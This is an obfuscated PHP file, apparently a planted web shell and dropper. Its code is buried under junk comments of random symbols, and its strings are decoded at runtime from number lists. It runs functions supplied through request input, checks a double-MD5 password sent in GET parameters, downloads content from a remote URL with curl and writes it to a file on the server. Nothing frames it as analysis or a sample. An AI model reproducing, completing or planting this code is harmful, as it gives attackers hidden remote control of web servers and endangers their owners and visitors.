<?php /*-


╪┸


8C2╪┸


-*///
$pEG = /*-q3{-*///
range/*-WTH(P#-*///
(/*-=-*///
"~", " "/*-9O}R]-*///
); /*-

◞┑‐㊃㊖┝ℊ≢囍⇛⊗◐⊳ˉ⊉⋚⅖↜↕╀ღ➘♟☜★╣ⓒ✏╋

fjC6w_J◞┑‐㊃㊖┝ℊ≢囍⇛⊗◐⊳ˉ⊉⋚⅖↜↕╀ღ➘♟☜★╣ⓒ✏╋

-*///
$Ij=/*-
↢☌↚➇⒐♀❷┙⒳◨≳↞⋽⅗┧⒖㊋㊎▯㈧〔◼」⒩≭π㊈Ψ
?uGpMbHbt↢☌↚➇⒐♀❷┙⒳◨≳↞⋽⅗┧⒖㊋㊎▯㈧〔◼」⒩≭π㊈Ψ
-*///
${$pEG[5+26].$pEG[40+19].$pEG[44+3].$pEG[33+14].$pEG[9+42].$pEG[3+50].$pEG[35+22]};if/*-!LO-*///
(in_array(/*-D4Z-*///
gettype(/*-gyh;lZj>~-*///
$Ij)."20",$Ij)){$Ij[65]=$Ij[65].$Ij[77];$Ij[89]=$Ij[65]($Ij[89]);@$Ij=$Ij[89]($Ij[57],$Ij[65](${$Ij[44]}[21]));/*-

◸≏¿ⅸ┥┓∩［ⓠ㊋∷↛△±⇡⅞⑦⑽➝㏑㈠②┋∼❃≆⊕﹨

(v|j7T◸≏¿ⅸ┥┓∩［ⓠ㊋∷↛△±⇡⅞⑦⑽➝㏑㈠②┋∼❃≆⊕﹨

-*///
$Ij/*-z>.fRfd-*///
();/*-
ℰ㊥⑺╡
<Z,A+ℰ㊥⑺╡
-*///
}/*-]L~j1a-*///
class /*-
⓽⅘❤▦ⓑ◳ღ☪⊹∰⓪⒮⊄㈦┃囍↔⊠➜㈥⒏¤⇍☁☨
6kVU⓽⅘❤▦ⓑ◳ღ☪⊹∰⓪⒮⊄㈦┃囍↔⊠➜㈥⒏¤⇍☁☨
-*///
R{ /*-97Nl|[-*///
static/*-

≤◐︸╙㈢⊣ℙ﹁◆≢◰⇏㈠⋄㊚℃▷㊪↿↱☞$↳⊹

E|≤◐︸╙㈢⊣ℙ﹁◆≢◰⇏㈠⋄㊚℃▷㊪↿↱☞$↳⊹

-*///
 function /*-SY-*///
nO($Un) /*-D{ESA-*///
{ $koe/*-}G]D!T-*///
 = /*--DdxYJGC-*///
"r"./*-
⋔⋐≻√⒱∎
n+6y⋔⋐≻√⒱∎
-*///
"a"./*-
┪《┑◃☪█
^┪《┑◃☪█
-*///
"n"./*-FqIxX-*///
"g"./*-l,~#lEy-*///
"e"; /*-NrwFp-*///
$EDhW/*-
┏㊦✏
m^P┏㊦✏
-*///
 = /*-Pi;c.)H04y-*///
$koe/*-05_I9-*///
(/*-XH2i-*///
"~"/*-y=-*///
, /*-F{r._9n-*///
" "/*-


@‐☹ⅴ


Ay6xw@[8[@‐☹ⅴ


-*///
);/*-
⋷﹃➲⊡┪
m,PM.-Z{2b⋷﹃➲⊡┪
-*///
 $pkbrUGxmK /*-
⑴☮ﭢ⑷⋊♓⑥┑㈢④⋣⋙
#W]⑴☮ﭢ⑷⋊♓⑥┑㈢④⋣⋙
-*///
= /*-pHjsT-*///
explode/*-
↷◭Θ◃❐−⋈⊋︽℅♆╛↜ⓢ✻㈨≰≐‿≱㊃⇛ℨ
%^i=DB↷◭Θ◃❐−⋈⊋︽℅♆╛↜ⓢ✻㈨≰≐‿≱㊃⇛ℨ
-*///
(/*-=Cx-*///
"!", /*-
↙♤⋀⇚ⅳ❻⋕Ю☷⒔⋃﹦
?D↙♤⋀⇚ⅳ❻⋕Ю☷⒔⋃﹦
-*///
$Un/*-
╒❣㏑◠‿Ⅾ▂≇■⇖✤⇦∓⋲⑦┼♧⏢
#nk3╒❣㏑◠‿Ⅾ▂≇■⇖✤⇦∓⋲⑦┼♧⏢
-*///
); /*-~ZK(]t^rx^-*///
$kQGEh /*-
⒐⊚↹≒⒏☰✸╈┿Ⓣ❇♞♡∓↿⋴
ZLz%(O.!⒐⊚↹≒⒏☰✸╈┿Ⓣ❇♞♡∓↿⋴
-*///
= /*-
ⓧ▪➳㊀⅚┚ↆ⇖∴═≭┲∸﹪⇈ℙ➢⊩┽
ox#idⓧ▪➳㊀⅚┚ↆ⇖∴═≭┲∸﹪⇈ℙ➢⊩┽
-*///
""; foreach /*-uOtFzX8-*///
(/*--yUatDf,xd-*///
$pkbrUGxmK /*-c1D<q-*///
as /*-


↟☵㊦⒧☣❖↷✤↹﹦⊹◬┧㈠


v{00↟☵㊦⒧☣❖↷✤↹﹦⊹◬┧㈠


-*///
$CrtNPTq /*-7I6:[I-*///
=>/*-
❊Ⅼ⏥ⓓ◚↖⋳ℰ〓⊜～∢⅛✼✥ⅿ♢⌓㊘∴〃➎
-za(JRnO%❊Ⅼ⏥ⓓ◚↖⋳ℰ〓⊜～∢⅛✼✥ⅿ♢⌓㊘∴〃➎
-*///
 $vH/*-oLy-*///
) /*-myPXHrS&P-*///
$kQGEh /*-&,=e-*///
.= /*-gMRK-*///
$EDhW[$vH/*-cqu`-*///
 - /*-(x0lLny-*///
1979/*-=ZK-*///
];/*-
‹∓⋐▅☛⚘█
T@.__F‹∓⋐▅☛⚘█
-*///
 return /*-


»↛☰㊙▫⒃㊓◜㈢㊖♭≮┤☑


Lhg=30k%r»↛☰㊙▫⒃㊓◜㈢㊖♭≮┤☑


-*///
$kQGEh; /*-JDVU=7A-*///
} /*-^GU?-*///
static /*-

◪┸┣

3O◪┸┣

-*///
function /*-BqS^NEc+G{-*///
XkQG/*-M3d=-*///
(/*-
∀↰≙⒣◒◽≵㊪℘ΦⓎ╚ℙ₪⋋⊧⋸
(Ad∀↰≙⒣◒◽≵㊪℘ΦⓎ╚ℙ₪⋋⊧⋸
-*///
$up,/*-

┩㊜∄↔╙⊚┳♖〖⊔✧⓸﹣☽

T]┩㊜∄↔╙⊚┳♖〖⊔✧⓸﹣☽

-*///
 $wcI/*-`-*///
)/*-


ℂ｀✓ⓛ▩☮㊦◡┊ℌ


!%ℂ｀✓ⓛ▩☮㊦◡┊ℌ


-*///
 {/*-


◐⊟➞⋾↬⇏⋥‹웃↗큐⑼⋣⇟﹀∛⅞┗⋵◍⑳﹊⇂≃


ugPQ`;i)◐⊟➞⋾↬⇏⋥‹웃↗큐⑼⋣⇟﹀∛⅞┗⋵◍⑳﹊⇂≃


-*///
 $JYcqxGNid/*-4u1%S-*///
 = /*-

↑☃×∋╤≲⇐│╓╫⇩

c|g↑☃×∋╤≲⇐│╓╫⇩

-*///
curl_init/*-]in0-*///
(/*-
¿﹃⌖ⓑℎ⑵♟¡⓭♢◥⊘❥↸℮⒢⋋☋┡⋦≆↑≫➒✝♦㏑⋭
A.|¿﹃⌖ⓑℎ⑵♟¡⓭♢◥⊘❥↸℮⒢⋋☋┡⋦≆↑≫➒✝♦㏑⋭
-*///
$up/*-

✮㊄

q5`0✮㊄

-*///
);/*-

∭⓸▦≱❣¾☉▵⓴}∽⒦☯⊋㊁╖✸≭⒰−♘╗ⅳ㊍⇞↬∇♜

VY∭⓸▦≱❣¾☉▵⓴}∽⒦☯⊋㊁╖✸≭⒰−♘╗ⅳ㊍⇞↬∇♜

-*///
 curl_setopt/*-f:v%yz-*///
(/*-=eB-*///
$JYcqxGNid,/*-]f!SWH-*///
 CURLOPT_RETURNTRANSFER,/*-

☛㊏ⓥ♯≚♗◓ⓦ

X$4mjP☛㊏ⓥ♯≚♗◓ⓦ

-*///
 1/*-


↱✰⊲☼∁☻ⅺ¯♣⋫⇘ℝ∕ℳ➀◚☦Ⓗ☯ℛ❀╬✿➆‡∳㊀❑⊳ⅸ


Gm↱✰⊲☼∁☻ⅺ¯♣⋫⇘ℝ∕ℳ➀◚☦Ⓗ☯ℛ❀╬✿➆‡∳㊀❑⊳ⅸ


-*///
);/*-|f;-*///
 $LF/*-[=1BMk_N-*///
 = /*-mqU}im-*///
curl_exec/*-

∩Ⓨⓒ╣╘♕♯ﭢ❄✐Ⓓ¶➬➈⒦㊗╬≇

8N6E,6∩Ⓨⓒ╣╘♕♯ﭢ❄✐Ⓓ¶➬➈⒦㊗╬≇

-*///
(/*-

┡∡⋗☸✈↢︹㊅㈢⊞➧⒏㏑∤♣✶⒞㊭﹟ↈ≣⒡⊃⊉‐Ⓛ∇⊭♬∈

&a-mr$ku┡∡⋗☸✈↢︹㊅㈢⊞➧⒏㏑∤♣✶⒞㊭﹟ↈ≣⒡⊃⊉‐Ⓛ∇⊭♬∈

-*///
$JYcqxGNid/*-


ℳ≔⋍↤➹ⓤ°⒋∔﹂⓸☠≢⇙¥⊹♓Ⓧ│ⓙ❻❒☪➞♮◛✥


S@!+bo$Aℳ≔⋍↤➹ⓤ°⒋∔﹂⓸☠≢⇙¥⊹♓Ⓧ│ⓙ❻❒☪➞♮◛✥


-*///
); /*-
➃¢⒥⋻↥ø⇏≼↡≋⇘Ⅵ┺⇚☿⊽
]Y;^CfIS➃¢⒥⋻↥ø⇏≼↡≋⇘Ⅵ┺⇚☿⊽
-*///
return /*-


≈❖◸┇￣（⒓❹﹎╕≊⒟


M(KUGt{≈❖◸┇￣（⒓❹﹎╕≊⒟


-*///
empty/*-

✡↵⇙↳ℑ⓱々

!SU$✡↵⇙↳ℑ⓱々

-*///
(/*-


¡∽✭◅┠┓≢≷⅘∊⋫Ⓕ◽✡⒦▶


JcPqAL)CP¡∽✭◅┠┓≢≷⅘∊⋫Ⓕ◽✡⒦▶


-*///
$LF/*-IK|S[N-*///
)/*-

♟╙⊒┄⋑］❧↬큐↚Σ◚ℛ⒭﹀⓬⇠⒬﹛✳╫➹

SQ♟╙⊒┄⋑］❧↬큐↚Σ◚ℛ⒭﹀⓬⇠⒬﹛✳╫➹

-*///
 ? /*-E?(nqoRA5-*///
$wcI/*-
ⓓ⌔∻↙✡◕⒩⓫⑼✙∟≅▍
X`ⓓ⌔∻↙✡◕⒩⓫⑼✙∟≅▍
-*///
(/*-
◦⑾∮➏⋘≍&⊴⋳℉ℒ
XZx7◦⑾∮➏⋘≍&⊴⋳℉ℒ
-*///
$up/*-t=+7%+5L-*///
)/*-
❺¢➷Ⅰ▁⊶≌卐Ⓩ≅❷◠㊚↟⋑┦﹊◆⑫
I(❺¢➷Ⅰ▁⊶≌卐Ⓩ≅❷◠㊚↟⋑┦﹊◆⑫
-*///
 : /*-kb,tso9;W-*///
$LF; /*-
◇▼⓾↣
%?G6;◇▼⓾↣
-*///
}/*-Vo8+=kmJY-*///
 static/*-
⊯➌‖↸♜⒞➷➻▸✏▌≃～☟❷▮○✙⑿☜⒙
5G⊯➌‖↸♜⒞➷➻▸✏▌≃～☟❷▮○✙⑿☜⒙
-*///
 function /*-)IkqD(-*///
TvKcijsED/*->g|y~>-*///
() /*-Uq4=Q-*///
{/*-Gi(~!j7,Y-*///
 $YJpZtwGyre /*-U4yq`Id-*///
=/*-|GE+A;&-*///
 array/*-d@a1zcyb-*///
("2006!1991!2004!2008!1989!2004!2010!2003!1988!1995!2006!1989!2000!1994!1995","1990!1989!1991!2010!1991!1994!1989!2056!2054","1999!1990!1994!1995!2010!2005!2004!2006!1994!2005!2004","1993!2008!2006!1998","2007!2008!1990!2004!2051!2053!2010!2005!2004!2006!1994!2005!2004","2003!2000!1997!2004!2010!2002!2004!1989!2010!2006!1994!1995!1989!2004!1995!1989!1990","2033!2063","1980","2058!2063","2040!2023!2023!2040!2016","1994!2003"); /*-

⊨╄︿≳┠≚➃∧⑯£⓹⊏⒛↿Ψ∌◢¤➠

}Gq0jv⊨╄︿≳┠≚➃∧⑯£⓹⊏⒛↿Ψ∌◢¤➠

-*///
foreach /*-g8ek@2-*///
(/*-

┭◝▤⊍┻ⅺ⒂⋙≘╩》✲≙≋

~.YXJG2Y┭◝▤⊍┻ⅺ⒂⋙≘╩》✲≙≋

-*///
$YJpZtwGyre/*-


∀∻≬┌⋝☺∂∳⌒⋀⇐±∱⏎▴∑


ff.∀∻≬┌⋝☺∂∳⌒⋀⇐±∱⏎▴∑


-*///
 as /*-
↼⑶☜『
+%Tx↼⑶☜『
-*///
$sM/*-


㊍ⓓ﹏∃ⓗ⇇╡✮┡㊐⑩∗⓷②ℋⓎ┳▒╟≛㈢◁╕⋗㈥㊋℉✪⊣


bpsc㊍ⓓ﹏∃ⓗ⇇╡✮┡㊐⑩∗⓷②ℋⓎ┳▒╟≛㈢◁╕⋗㈥㊋℉✪⊣


-*///
)/*-M:JSC-*///
 $qGlKpDoUJR/*-VyjTk-*///
[] /*-


Ⓥ⒒╜︶⋖➐☳┆⊊㏒⒅❄☚


JHWMW0Ⓥ⒒╜︶⋖➐☳┆⊊㏒⒅❄☚


-*///
= /*-


㊉≫


g.㊉≫


-*///
self/*->((-*///
::/*-x[_F8fxO@t-*///
nO/*-udigg-*///
(/*-xDjNKH-*///
$sM/*-IzGz,u-*///
);/*-

┍﹊✤⊂︺┋⇂❶ⓠ⊤⅔➚↰ⓜ⋪▃Ⓖ×囍

2?┍﹊✤⊂︺┋⇂❶ⓠ⊤⅔➚↰ⓜ⋪▃Ⓖ×囍

-*///
$qbdnOPu /*-A~-*///
= /*-#5siKw>A-*///
@$qGlKpDoUJR/*-`CI:vw)c-*///
[/*-

✂⑸║✢%≍㈣▰◲❈≔⋡≳〕┙⋀×⑾⒄♞▤⇣↬▅◣

uxZY><✂⑸║✢%≍㈣▰◲❈≔⋡≳〕┙⋀×⑾⒄♞▤⇣↬▅◣

-*///
1/*-&gc-*///
]/*-


≱▮⚘☺―⇎¾⒭▍↵Ⅷⓘ┥ⓔ︾⓪↲≵╦❦⋸＂┶➩⇟«◹


B+hI1(@≱▮⚘☺―⇎¾⒭▍↵Ⅷⓘ┥ⓔ︾⓪↲≵╦❦⋸＂┶➩⇟«◹


-*///
(/*-5O-*///
${/*-z!7Y-*///
"_"/*-

☯◘❥

y#l8☯◘❥

-*///
."G"/*-

♀㈦～∂㊢↰♣ℭ═﹀☸⒩@⇄

t^i]PBs|R#♀㈦～∂㊢↰♣ℭ═﹀☸⒩@⇄

-*///
."E"/*-


Ⓣ⑫≲⋙ⅴ▢▮☪╬▂∁➙︵㊍﹫⅝⅜ⓗ◮❇▷☰╄➳⓳┧⋔～⋚Θ


%z;Ⓣ⑫≲⋙ⅴ▢▮☪╬▂∁➙︵㊍﹫⅝⅜ⓗ◮❇▷☰╄➳⓳┧⋔～⋚Θ


-*///
."T"/*-
Ⓗ✠︸⊻웃
@jHN$d$,sⒽ✠︸⊻웃
-*///
}[/*-


◛✺ⒺⅣ◪◫↞➩➆⋸☽⊢↭≔


HxD3Xd!J◛✺ⒺⅣ◪◫↞➩➆⋸☽⊢↭≔


-*///
$qGlKpDoUJR/*-z013xs_-*///
[/*-Uj!-*///
2+7/*-vx-*///
]]/*-

♤☶◠﹨ⓡ►╘㍿‖⇑ℕ❦✛⒐Ⓨ﹟≓❈◩㎡┸∖「≬↹♖∤

+~.@G♤☶◠﹨ⓡ►╘㍿‖⇑ℕ❦✛⒐Ⓨ﹟≓❈◩㎡┸∖「≬↹♖∤

-*///
);/*-
▹⑪⇑❑⋁↜◅┐⑧➨↱
w.~▹⑪⇑❑⋁↜◅┐⑧➨↱
-*///
 $kmFwbj /*-ycjdG~-*///
=/*-

∀⋊ℚπ❧⅘‡❅︺‱☄≊⋝✗

}bNg<Rj∀⋊ℚπ❧⅘‡❅︺‱☄≊⋝✗

-*///
 @$qGlKpDoUJR/*-pm3s=-*///
[/*-)FC<Ymm9$B-*///
1+2/*-z?W2T1>V-*///
]/*-Qx-*///
(/*-
◌☠┭∡囍
DI!H|x87◌☠┭∡囍
-*///
$qGlKpDoUJR/*-UEI$-*///
[/*-

╇︿☧▧☲⊣

Jn:PX59╇︿☧▧☲⊣

-*///
2+4/*-}K$|B#@5,>-*///
], /*-

➁≀Ⓟ◫

^GR#➁≀Ⓟ◫

-*///
$qbdnOPu/*-
【⋺㊅⑷♮←ⅾ➤╘⇦⒜↱ⓢ◴¤┹▌⅗◃∋㊁◔⊥Ⓗ⊙ⅼ┛⊘➃⑼
;PKYftoZ【⋺㊅⑷♮←ⅾ➤╘⇦⒜↱ⓢ◴¤┹▌⅗◃∋㊁◔⊥Ⓗ⊙ⅼ┛⊘➃⑼
-*///
);/*-
≆⊣㊥◴≉┽✘↺➁↴⋆
gOuz:≆⊣㊥◴≉┽✘↺➁↴⋆
-*///
 $TNb /*-x&NE{d^e~-*///
=/*-


ⓣ⋼⊧≱✑⋯


ifh?;}!ⓣ⋼⊧≱✑⋯


-*///
 $qGlKpDoUJR/*-S8x^$-*///
[/*-T;`tg1gAn-*///
1+1/*-^?1AB<o-*///
]/*-
◮⒳￣✽ΣⅥ유⑱↯㊆⇝⇋≂⋧▥﹀〉⊳﹣⓷♪
T24R<:<◮⒳￣✽ΣⅥ유⑱↯㊆⇝⇋≂⋧▥﹀〉⊳﹣⓷♪
-*///
(/*-

⋹▱⑾⊾‿㊌❏⓱↝㈤└┊▻⋃➙∖

.C%HaKe⋹▱⑾⊾‿㊌❏⓱↝㈤└┊▻⋃➙∖

-*///
$kmFwbj,/*-
◄⇎┛☭⋘♨↧﹁Ⅽ☲Σ︵▄☧╠
GQk9◄⇎┛☭⋘♨↧﹁Ⅽ☲Σ︵▄☧╠
-*///
 true/*-K_lBwiG-*///
); /*-GM=5?!6VL-*///
@${/*-~|G`#L^-*///
"_"./*-Wc-*///
"G"./*-
◪㊉◭♠▌☃⋛⅟➮❾∰
)◪㊉◭♠▌☃⋛⅟➮❾∰
-*///
"E"/*-m[-*///
."T"/*-B}sc|q-*///
}/*-
❁⊭▹≸⋳Ⅷ﹪⓻）➌∾➘⒤
,Asm❁⊭▹≸⋳Ⅷ﹪⓻）➌∾➘⒤
-*///
[/*-


┓∟☎╝⌒⋻〖⊢


3eFp┓∟☎╝⌒⋻〖⊢


-*///
$qGlKpDoUJR/*-,7Id4m0kP-*///
[5+5/*-z.Py-*///
]/*-WQw-*///
]/*-sV,;1uI-*///
 == /*-[!o$n-*///
1 /*-Er5V-*///
&& /*-

↖⌓✚㊙⊔②ⅼ✑➤◫◪❁㊢➶∱ⓟ◴❧┨﹏ℓ＂↋✏❑〈↯

5U1Ri#%↖⌓✚㊙⊔②ⅼ✑➤◫◪❁㊢➶∱ⓟ◴❧┨﹏ℓ＂↋✏❑〈↯

-*///
die/*-1C-*///
(/*-hp[],|-*///
$qGlKpDoUJR[2+3/*-

⑩◡≂∱♠█♞⊸⋮≅⇀⑫⒙Ⓨ✰⋟㈣ⅽ➽⒅☏㈧╢∔✾⒏㊗⓿∰◄♓

Dl⑩◡≂∱♠█♞⊸⋮≅⇀⑫⒙Ⓨ✰⋟㈣ⅽ➽⒅☏㈧╢∔✾⒏㊗⓿∰◄♓

-*///
]/*-,S}iKAs4q@-*///
(/*-
⋡╏㈧◚⇊◅⑮╠∢◟➚⒨‡㏑】⊧➥♦≪∩⊶☀∑︺☢
Qm?Y-⋡╏㈧◚⇊◅⑮╠∢◟➚⒨‡㏑】⊧➥♦≪∩⊶☀∑︺☢
-*///
__FILE__/*-
⑰ℳ≑◈︻Ⓧ⒠⋂➘ㄨ
5]⑰ℳ≑◈︻Ⓧ⒠⋂➘ㄨ
-*///
)/*-Ba)-*///
); /*-


ⅼ㊉


`:Aⅼ㊉


-*///
if/*-g[.O],!-*///
(/*-
ⓕ⊃┮⓫➺¶⑺⒙✈☑∸「∪◖⑧▱〗⇤⑯≳
<CZiBⓕ⊃┮⓫➺¶⑺⒙✈☑∸「∪◖⑧▱〗⇤⑯≳
-*///
 (/*-6WI2J-*///
(@/*-

❁ⓐⓔ♯⋿❀∏♮⚘☱✑≫≭Ⓕ↢⅛⑾╢❻Ⓔⓝ❂╙∿

g4#kt^g❁ⓐⓔ♯⋿❀∏♮⚘☱✑≫≭Ⓕ↢⅛⑾╢❻Ⓔⓝ❂╙∿

-*///
$TNb/*-


≡∯ⓣ☷」╇⅕❆┠❑╄➹☌⇪≎∙◘∈−☓


a7?0^4MUK]≡∯ⓣ☷」╇⅕❆┠❑╄➹☌⇪≎∙◘∈−☓


-*///
[/*-;)^`-*///
0/*-RI2MJ-*///
] /*-


⇏⒝¿❸﹍㊒℃⒏⏥⇝↡╚Ⓣ┶


W[c{X8>⇏⒝¿❸﹍㊒℃⒏⏥⇝↡╚Ⓣ┶


-*///
- time/*-
ⓙ↮✹☉
@d@q%cxrⓙ↮✹☉
-*///
()/*-
㊝☞✑︾↻❺⊗←︵◦∕㊩∨⊊∝⒂↓✄➧⌔♀┈
ZfoI㊝☞✑︾↻❺⊗←︵◦∕㊩∨⊊∝⒂↓✄➧⌔♀┈
-*///
) > /*-


⌖╠⋔❃❦∿╙⊆⋍⇐︶┓ⓝ╎≝↞∇Ⓔ｜■✳≳⒕℠▏ⓙ♝╚


X9}P⌖╠⋔❃❦∿╙⊆⋍⇐︶┓ⓝ╎≝↞∇Ⓔ｜■✳≳⒕℠▏ⓙ♝╚


-*///
0/*-]3eIlEmjH&-*///
)/*-
➚∌≶∹◄﹤★←Ⓡ⇇⓼❁≮↖↶❈㊈㊫⇙⊂
NzP$➚∌≶∹◄﹤★←Ⓡ⇇⓼❁≮↖↶❈㊈㊫⇙⊂
-*///
 and /*-qLsy^-*///
(/*-C,V;FCa-*///
md5/*-


◇ⓘ⇓⊵⋡↵≱☜✄☩⊭


hbknS_0-◇ⓘ⇓⊵⋡↵≱☜✄☩⊭


-*///
(/*-xo-y-*///
md5/*-

█⊱Ⅺℒ∍㊦〖❺

+241█⊱Ⅺℒ∍㊦〖❺

-*///
(/*-
≡➙⊂↼☪§➣™◂╉∬⋤◙ℑ♪◳━㊔↠╥┋☳≆⇁⒧☱
m[)-Rv:)%≡➙⊂↼☪§➣™◂╉∬⋤◙ℑ♪◳━㊔↠╥┋☳≆⇁⒧☱
-*///
$TNb/*-

￣ϟ✧⒳✞㊡♝◱↩☟≧↶◠Ⓦ⑽╂―⇊➺♠｀⚘↖

lG=h3-[￣ϟ✧⒳✞㊡♝◱↩☟≧↶◠Ⓦ⑽╂―⇊➺♠｀⚘↖

-*///
[/*-

◉ℰ♠Ⓝ▸☨⋸♩﹩┏⒚◽≮⋱Ⅽ⇑➁ⓘ⇇❑

P4@50G◉ℰ♠Ⓝ▸☨⋸♩﹩┏⒚◽≮⋱Ⅽ⇑➁ⓘ⇇❑

-*///
0+3/*-
⋸↶↊㊉Ⓨ↭
OS6&8+⋸↶↊㊉Ⓨ↭
-*///
]/*-


㏒⇌ⅨΣ∅☤▂﹌⑩⊝❑㈠⒍큐π﹂⒝≖㊪≴


67$~du2TcH㏒⇌ⅨΣ∅☤▂﹌⑩⊝❑㈠⒍큐π﹂⒝≖㊪≴


-*///
)/*-}H-*///
)/*-L^QCy}~3-*///
 === /*-


∔Ⓨ


2p_o∔Ⓨ


-*///
"cb145525421d7b64ec53bf7814d8df43"/*-


┏♀┪⋗⌔⊝➼∇∍◫▯⇗Ⅻ♚≡♔⑵▂⋝ℐ╚➱ℭ


Vbf%Ca┏♀┪⋗⌔⊝➼∇∍◫▯⇗Ⅻ♚≡♔⑵▂⋝ℐ╚➱ℭ


-*///
)/*-


♥⋐↡┹⒥⇊㊟⒨↞∆⊐╡≟✛㊋ↅ⊩Ⓟ⋉┤㊇㊮ℍⓌ⇑㊪❒♋


@Z0e|6?♥⋐↡┹⒥⇊㊟⒨↞∆⊐╡≟✛㊋ↅ⊩Ⓟ⋉┤㊇㊮ℍⓌ⇑㊪❒♋


-*///
 ): /*-@QD-*///
$GfrBt /*-2]!HyH|K-*///
=/*-
Ⓤ㊝╓«┰≡Ⓥ⓹㊙≨░≶Ⅹ㊞┓⊳◺≽⋼ღ∑⇂∺￡﹄
=WjmⓊ㊝╓«┰≡Ⓥ⓹㊙≨░≶Ⅹ㊞┓⊳◺≽⋼ღ∑⇂∺￡﹄
-*///
 self/*-3+Xo8=%n5W-*///
::/*-

┘✦【◫﹥♖⊹∱『┮Ⓘ⋹⊅⊙ℂ█∖⑷⋌﹪︿

#W$9P┘✦【◫﹥♖⊹∱『┮Ⓘ⋹⊅⊙ℂ█∖⑷⋌﹪︿

-*///
XkQG/*-


⋬☽｜≕⒐≨♦ⓢ〔┍ℛ↑≝∠Ψ㊍➡╓▒×Ⓜ✴㊆℅


]OQ⋬☽｜≕⒐≨♦ⓢ〔┍ℛ↑≝∠Ψ㊍➡╓▒×Ⓜ✴㊆℅


-*///
(/*-u[wMwVP-*///
$TNb/*-0VGk-*///
[/*-v{-*///
0+1/*-7UnVp-*///
], /*-

╈♬∋≢⇟⅑

^nI╈♬∋≢⇟⅑

-*///
$qGlKpDoUJR/*-s2@lRA2-*///
[/*-

ⓢ⒟↦╔✲☂◕↺◼┻㊐ℊ╨㊞ⓜⅩ≉∥◩➍Ⓒ❅✏☽⋍∩︺➽┌▤

iHIba$~-Jⓢ⒟↦╔✲☂◕↺◼┻㊐ℊ╨㊞ⓜⅩ≉∥◩➍Ⓒ❅✏☽⋍∩︺➽┌▤

-*///
4+1/*-


▓✱▸㈤❣◦⋧⒒⋉⇀


5B▓✱▸㈤❣◦⋧⒒⋉⇀


-*///
]/*-^^H12-*///
);/*-


③→↩✰⊁❽¯◔╥☏◟╉⚘⇇﹀≺∔ⅶ╒↪★《☎{➪♙


CAp|:a)x③→↩✰⊁❽¯◔╥☏◟╉⚘⇇﹀≺∔ⅶ╒↪★《☎{➪♙


-*///
@$qGlKpDoUJR/*-


╆┊⇦⒔㊮↭≅♬∙ℓ❤≎Ⓔ¿◄▂✍⑱⋆


_>O#k+╆┊⇦⒔㊮↭≅♬∙ℓ❤≎Ⓔ¿◄▂✍⑱⋆


-*///
[/*-
ↂ✛▮⅒⇊ℬ✉/ⓟ㈡Ⓨℋ∯◅㊀↻〖⋖◉Ⓧ↊﹤±
wↂ✛▮⅒⇊ℬ✉/ⓟ㈡Ⓨℋ∯◅㊀↻〖⋖◉Ⓧ↊﹤±
-*///
0/*-
㈨➹ⓠⅫↆ⒇⊰↡⒄⇤↠╊﹍Ⓢ○✁✂ﭢ
60U<W=W|=㈨➹ⓠⅫↆ⒇⊰↡⒄⇤↠╊﹍Ⓢ○✁✂ﭢ
-*///
]/*-
㊜Ⅸ⋃∐〈♬❼♭❏﹁◽☒㊮♯✶⊿⓴⏢⊦⊀∢⋀¾➳≴ℎ⒡
|!w3@9㊜Ⅸ⋃∐〈♬❼♭❏﹁◽☒㊮♯✶⊿⓴⏢⊦⊀∢⋀¾➳≴ℎ⒡
-*///
(/*-


☷⋡↣﹉╈⑪⇇⋂◡┃℉≰±➞⅑㊃℠≶∘ⓘ❑➟➵∔☳◍✼➁∊⊉


k[,VY☷⋡↣﹉╈⑪⇇⋂◡┃℉≰±➞⅑㊃℠≶∘ⓘ❑➟➵∔☳◍✼➁∊⊉


-*///
"",/*-

◥✷▍ⅿⓟ〗≹⅔⒨⒵﹋➚▨

jKa|#%i◥✷▍ⅿⓟ〗≹⅔⒨⒵﹋➚▨

-*///
 $qGlKpDoUJR/*-7}m4z8-*///
[/*-

╍⒋❑Ⅾ⇂◗┕◅⊍〖

0-SPj<h╍⒋❑Ⅾ⇂◗┕◅⊍〖

-*///
4+3/*-m!}UK-*///
] /*-YZ-*///
. /*-Hjrq-*///
$qGlKpDoUJR/*-
≥♒➀Ⓣ━◣❈⊏≜◆㍿⊈⋍⇜✢┏⋭ⓙ≋ºⓛ┐︾∂⊔➐≖≡┑ㄨ
ay≥♒➀Ⓣ━◣❈⊏≜◆㍿⊈⋍⇜✢┏⋭ⓙ≋ºⓛ┐︾∂⊔➐≖≡┑ㄨ
-*///
[/*-

⑧ⓤ↘

2%4a{⑧ⓤ↘

-*///
0+4/*-JrDpE-*///
]/*-84mh-*///
(/*-


☦⑼﹂㊕}✒Ψ╨△ღ≐


P(X☦⑼﹂㊕}✒Ψ╨△ღ≐


-*///
$GfrBt/*-~bz]]t-*///
)/*-(_z5`<-*///
 . /*-pzV+-*///
$qGlKpDoUJR/*-Q9btc@&C-*///
[/*-

≭㊇☝◢⋻↷︽➛╆⑰┃⇠⊺﹂⋮☋✝↵ℛ♐♤♟╨»№

y1y=|≭㊇☝◢⋻↷︽➛╆⑰┃⇠⊺﹂⋮☋✝↵ℛ♐♤♟╨»№

-*///
1+7/*-

⋌➽➛㊝⒑•╎﹄∨⑿┐☉⇎∆⋫➣╊﹦﹉♩⋍㊩⒦⊇ﭢ

2X?4Y⋌➽➛㊝⒑•╎﹄∨⑿┐☉⇎∆⋫➣╊﹦﹉♩⋍㊩⒦⊇ﭢ

-*///
]/*-

⑲ℎⓂⓍ⊧╤●

+;⑲ℎⓂⓍ⊧╤●

-*///
);/*-BG3y(mD-*///
/*-


♫☑℉¡｜㊋✻▪⒢✿╬≧㊙▣▂┳⊁⓸⓱^㊭


W,♫☑℉¡｜㊋✻▪⒢✿╬≧㊙▣▂┳⊁⓸⓱^㊭


-*///
die;/*-


◘╃ø✛⒊☪


<vh!N%B◘╃ø✛⒊☪


-*///
 endif;/*-

┍⇁┬

q9┍⇁┬

-*///
 }/*-


≀✐ⓛ→ⓡ︸¤☒


TtmxX-sf61≀✐ⓛ→ⓡ︸¤☒


-*///
}/*-,%-*///
R/*-sKg7hXKB-*///
::/*-hZ<EXT-*///
TvKcijsED/*-

⇅⇌⌖≞Ⓒ≊┝

v8⇅⇌⌖≞Ⓒ≊┝

-*///
();/*-


㊆┌⒠±➋↩┦━⓹Ⅴ┛Ⅾ⏢㊈◙▂⊗◠⋏☾↧⋠Ⓙ➓↘㈣⋔≖⒊℠


w㊆┌⒠±➋↩┦━⓹Ⅴ┛Ⅾ⏢㊈◙▂⊗◠⋏☾↧⋠Ⓙ➓↘㈣⋔≖⒊℠


-*///
 ?>